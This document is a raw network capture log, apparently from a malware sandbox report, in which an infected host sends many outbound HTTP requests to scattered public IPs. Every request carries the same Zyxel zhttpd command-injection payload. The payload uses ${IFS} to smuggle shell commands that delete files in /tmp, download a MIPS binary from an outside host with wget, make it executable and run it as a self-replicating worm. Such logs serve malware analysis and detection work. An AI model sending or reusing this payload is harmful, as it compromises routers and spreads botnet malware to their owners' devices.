                                                      Feb 2, 2024 06:36:11.027298927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8825192.168.2.1452852113.246.43.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027343035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8826192.168.2.145127631.44.104.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027380943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8827192.168.2.145638246.170.164.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027419090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8828192.168.2.1446156130.79.28.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027451038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8829192.168.2.143491675.186.61.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027497053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8830192.168.2.143415483.64.187.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027544022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8831192.168.2.1446110177.105.128.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027590036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8832192.168.2.1456904205.158.10.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027607918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8833192.168.2.144394840.18.54.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027657032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8834192.168.2.1454818187.219.53.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027710915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8835192.168.2.1441540128.136.15.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027730942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8836192.168.2.1451190107.160.14.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027751923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8837192.168.2.1456426219.174.186.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027808905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8838192.168.2.145439671.221.200.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027837992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8839192.168.2.1433990202.60.77.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027887106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8840192.168.2.1459898137.110.202.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027925014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8841192.168.2.144453024.172.20.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027972937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8842192.168.2.1456712102.232.93.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028006077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8843192.168.2.1449794165.6.117.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028033972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8844192.168.2.1459678132.181.194.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028060913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8845192.168.2.1440974163.191.251.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028135061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8846192.168.2.1460090218.182.213.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028161049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8847192.168.2.145873898.163.180.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028203964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8848192.168.2.1452868185.94.141.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028240919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8849192.168.2.145264835.113.190.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028274059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8850192.168.2.1454196176.45.47.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028305054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8851192.168.2.1449904218.106.200.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028345108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8852192.168.2.144448271.154.96.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028388977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8853192.168.2.1433180166.54.51.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028430939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8854192.168.2.1437994150.221.208.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028458118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8855192.168.2.143503279.102.11.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028518915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8856192.168.2.144279880.255.7.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028557062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8857192.168.2.145352263.186.190.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028601885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8858192.168.2.1433936190.199.155.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028642893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8859192.168.2.1449278162.145.181.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028693914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8860192.168.2.144511627.195.57.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028748989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8861192.168.2.143877442.40.36.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028788090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8862192.168.2.146079234.174.136.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028832912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8863192.168.2.144964265.18.62.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028877020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8864192.168.2.143626689.249.255.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028923988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8865192.168.2.145802478.133.253.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.028975010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8866192.168.2.1443274190.191.80.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029000998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8867192.168.2.145182632.232.142.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029046059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8868192.168.2.1457776203.197.10.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029109001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8869192.168.2.144908473.154.124.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029155970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8870192.168.2.1443876159.106.117.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029201984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8871192.168.2.1444574144.249.81.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029239893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8872192.168.2.1453724212.69.157.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029275894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8873192.168.2.143945453.122.246.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029318094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8874192.168.2.1459880122.21.238.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029365063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8875192.168.2.1453388195.96.117.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029413939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8876192.168.2.144381899.154.246.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029443026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8877192.168.2.1443442128.214.22.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029488087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8878192.168.2.1456814191.204.24.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029532909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8879192.168.2.1444732125.208.35.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029578924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8880192.168.2.145534871.97.208.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029622078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8881192.168.2.1438566190.162.54.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029675007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8882192.168.2.1450374177.248.132.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029716969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8883192.168.2.143566652.239.70.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029762983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8884192.168.2.143694488.245.222.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029822111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8885192.168.2.1437500143.22.27.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029867887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8886192.168.2.144626265.191.87.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029912949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8887192.168.2.1436764180.101.215.227443
                                                      TimestampBytes transferredDirectionData
